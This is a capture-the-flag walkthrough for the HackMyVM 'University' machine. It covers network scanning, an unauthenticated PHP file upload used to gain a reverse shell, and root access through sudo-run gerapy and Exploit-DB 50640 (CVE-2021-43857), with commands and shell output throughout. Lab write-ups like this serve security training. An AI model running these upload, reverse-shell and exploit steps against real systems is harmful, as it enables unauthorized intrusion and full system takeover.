Writeup of University from HackMyVM – Walkthrough
University is an easy machine from the HackMyVM platform. The author of the machine is SML. The machine’s main exploit is insecure file upload leading to remote code execution. The machine is fairly easy. “Writeup of University from HackMyVM – Walkthrough”
Step 1: ARP Scan
As usual, my enumeration began with the arp-scan on the network to identify the IP address of the target.
┌──(kali㉿kali)-[~/hackmyvm/university]
└─$ fping -aqg 10.0.0.0/24
10.0.0.1
10.0.0.2
10.0.0.3
10.0.0.4
10.0.0.129Here, 10.0.0.4 is my IP address whereas 10.0.0.129 is that of the target.
Step 2: Nmap scan
The next stuff is the nmap port scan so that we can identify the services to enumerate.
┌──(kali㉿kali)-[~/hackmyvm/university]
└─$ nmap -T4 -sC -sV -p- -oN nmap.log 10.0.0.129
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-20 20:39 +0545
Nmap scan report for 10.0.0.129
Host is up (0.0021s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 8e:ee:da:29:f1:ae:03:a5:c3:7e:45:84:c7:86:67:ce (RSA)
| 256 f8:1c:ef:96:7b:ae:74:21:6c:9f:06:9b:20:0a:d8:56 (ECDSA)
|_ 256 19:fc:94:32:41:9d:43:6f:52:c5:ba:5a:f0:83:b4:5b (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-git:
| 10.0.0.129:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Remotes:
|_ https://github.com/rskoolrash/Online-Admission-System
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelFrom the Nmap scan, we see a git remote repository. This makes it easier to enumerate further. I suggest having a code editor like VSCode to analyse a repo. In this case, you certainly don’t need to perform a gobuster scan. So, I won’t do this here.
Step 3: Insecure file upload
There is a file called adminsession.php that checks for the admin session.
<?php
extract($_POST);
if (!isset($_SESSION[ad]))
{
echo "<br>You are not Logged In Please Login to Access this Page<br>";
echo "<a href=adminlogin.php>Click Here to Login</a>";
exit();
}
?>This file checks if the admin has logged in. However, in files documents.php and fileupload.php, we are missing its inclusion.
In documents.php, the fileupload.php is included. The fileupload.php file has further information on where the uploaded file is present. Furthermore, there is no check of file extensions at all. So, we can upload PHP shells.
<?php
session_start();
$sp=mysqli_connect("localhost","root","","oas");
if($sp->connect_errno){
echo "Error <br/>".$sp->error;
}
$picpath="studentpic/";
$docpath="studentdoc/";
$proofpath="studentproof/";
$id=$_SESSION['user'];
if(isset($_POST['fpicup']))
// snipThus, I uploaded a PHP shell in all of the file inputs from documents.php that I could access from the mentioned path. Finally, I got the shell.
┌──(kali㉿kali)-[~/hackmyvm/university]
└─$ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.0.0.129.
Ncat: Connection from 10.0.0.129:34860.
Linux university 5.10.0-10-amd64 #1 SMP Debian 5.10.84-1 (2021-12-08) x86_64 GNU/Linux
10:58:23 up 3:17, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ Check this link for upgrading reverse shell
Step 4: Switch to root
In the /var/www/html directory, there is a file containing the password of the user sandra. With this password, we can switch to the user sandra.
The user sandra can run gerapy with sudo permission. Gerapy is a framework written in Django. There is an exploit allowing remote command execution.
https://www.exploit-db.com/exploits/50640
However, for this, we should have a project running with gerapy. So, I initiated a project.
sandra@university:/tmp/exploit$ sudo gerapy init
Initialized workspace gerapy
sandra@university:/tmp/exploit$ cd gerapy/
sandra@university:/tmp/exploit/gerapy$ sudo gerapy migrate
Operations to perform:
Apply all migrations: admin, auth, authtoken, contenttypes, core, django_apscheduler, sessions
Running migrations:
Applying contenttypes.0001_initial... OK
Applying auth.0001_initial... OK
Applying admin.0001_initial... OK
Applying admin.0002_logentry_remove_auto_add... OK
Applying admin.0003_logentry_add_action_flag_choices... OK
Applying contenttypes.0002_remove_content_type_name... OK
Applying auth.0002_alter_permission_name_max_length... OK
Applying auth.0003_alter_user_email_max_length... OK
Applying auth.0004_alter_user_username_opts... OK
Applying auth.0005_alter_user_last_login_null... OK
Applying auth.0006_require_contenttypes_0002... OK
Applying auth.0007_alter_validators_add_error_messages... OK
Applying auth.0008_alter_user_username_max_length... OK
Applying auth.0009_alter_user_last_name_max_length... OK
Applying auth.0010_alter_group_name_max_length... OK
Applying auth.0011_update_proxy_permissions... OK
Applying authtoken.0001_initial... OK
Applying authtoken.0002_auto_20160226_1747... OK
Applying authtoken.0003_tokenproxy... OK
Applying core.0001_initial... OK
Applying core.0002_auto_20180119_1210... OK
Applying core.0003_auto_20180123_2304... OK
Applying core.0004_auto_20180124_0032... OK
Applying core.0005_auto_20180131_1210... OK
Applying core.0006_auto_20180131_1235... OK
Applying core.0007_task_trigger... OK
Applying core.0008_auto_20180703_2305... OK
Applying core.0009_auto_20180711_2332... OK
Applying core.0010_auto_20191027_2040... OK
Applying django_apscheduler.0001_initial... OK
Applying django_apscheduler.0002_auto_20180412_0758... OK
Applying django_apscheduler.0003_auto_20200716_1632... OK
Applying django_apscheduler.0004_auto_20200717_1043... OK
Applying django_apscheduler.0005_migrate_name_to_id... OK
Applying django_apscheduler.0006_remove_djangojob_name... OK
Applying django_apscheduler.0007_auto_20200717_1404... OK
Applying django_apscheduler.0008_remove_djangojobexecution_started... OK
Applying sessions.0001_initial... OKHere, we also have to initialize a project “gerapy”.
Then, we should run this as the root for getting root privilege using remote command execution. Before that, I created a super admin user.
andra@university:/tmp/exploit/gerapy$ sudo gerapy createsuperuser
Username (leave blank to use 'root'): root
Email address:
Password:
Password (again):
The password is too similar to the username.
This password is too short. It must contain at least 8 characters.
This password is too common.
Bypass password validation and create user anyway? [y/N]: y
Superuser created successfully.
sandra@university:/tmp/exploit/gerapy$ sudo gerapy runserver 0.0.0.0:8000
Watching for file changes with StatReloader
Performing system checks...
System check identified no issues (0 silenced).
INFO - 2022-01-29 01:22:15,360 - process: 493 - scheduler.py - gerapy.server.core.scheduler - 102 - scheduler - successfully synced task with jobs with force
January 29, 2022 - 01:22:15
Django version 2.2.24, using settings 'gerapy.server.server.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.This exposes the server on the network and we can run the exploit from the exploit db.
┌──(kali㉿kali)-[~/hackmyvm/university]
└─$ searchsploit -m 50640
Exploit: Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)
URL: https://www.exploit-db.com/exploits/50640
Path: /usr/share/exploitdb/exploits/python/remote/50640.py
File Type: Python script, ASCII text executable
Copied to: /home/kali/hackmyvm/university/50640.pyLastly, I updated the exploit with the credentials and ran it.
┌──(kali㉿kali)-[~/hackmyvm/university]
└─$ python3 50640.py -t 10.0.0.129 -p 8000 -L 10.0.0.4 -P 9001
______ _______ ____ ___ ____ _ _ _ _____ ___ ____ _____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | | || ||___ / ( _ ) ___|___ |
| | \ \ / /| _| _____ __) | | | |__) | |_____| || |_ |_ \ / _ \___ \ / /
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__ _|__) | (_) |__) |/ /
\____| \_/ |_____| |_____|\___/_____|_| |_||____/ \___/____//_/
Exploit for CVE-2021-43857
For: Gerapy < 0.9.8
[*] Resolving URL...
[*] Logging in to application...
[*] Login successful! Proceeding...
[*] Getting the project list
Traceback (most recent call last):
File "/home/kali/hackmyvm/university/50640.py", line 130, in <module>
exp.exploitation()
File "/home/kali/hackmyvm/university/50640.py", line 76, in exploitation
name = dict3[0]['name']
IndexError: list index out of rangeI got the error and found that it couldn’t get projects. So, I added a project from the web app itself. After this, it found the project and the error was gone. Also, I got the shell.
┌──(kali㉿kali)-[~/hackmyvm/university]
└─$ python3 50640.py -t 10.0.0.129 -p 8000 -L 10.0.0.4 -P 9001
______ _______ ____ ___ ____ _ _ _ _____ ___ ____ _____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | | || ||___ / ( _ ) ___|___ |
| | \ \ / /| _| _____ __) | | | |__) | |_____| || |_ |_ \ / _ \___ \ / /
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__ _|__) | (_) |__) |/ /
\____| \_/ |_____| |_____|\___/_____|_| |_||____/ \___/____//_/
Exploit for CVE-2021-43857
For: Gerapy < 0.9.8
[*] Resolving URL...
[*] Logging in to application...
[*] Login successful! Proceeding...
[*] Getting the project list
[*] Found project: project
[*] Getting the ID of the project to build the URL
[*] Found ID of the project: 1
[*] Setting up a netcat listener
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
[*] Executing reverse shell payload
[*] Watchout for shell! :)
Ncat: Connection from 10.0.0.129.
Ncat: Connection from 10.0.0.129:48416.
root@university:/tmp/exploit/gerapy# Check my walkthrough of Connection from the HackMyVM platform.